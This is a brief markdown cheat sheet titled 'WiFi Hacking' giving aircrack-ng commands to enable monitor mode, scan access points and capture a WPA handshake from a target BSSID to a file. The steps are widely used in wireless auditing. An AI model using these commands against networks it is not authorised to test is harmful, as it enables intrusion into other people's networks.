# WiFi Hacking
Check for processes that use the wireless interface and kill them
`airmon-ng check kill`
Start the interface in monitor mode
`airmon-ng start wlan0`
Sniff out available access points
`airodump-ng wlan0mon`
Start airodump-ng with the correct channel and bssid filter to capture handshake to file
`airodump-ng -c 1 --bssid 00:11:22:33:44:55 -w dumpfile wlan0mon --ignore-negative-one`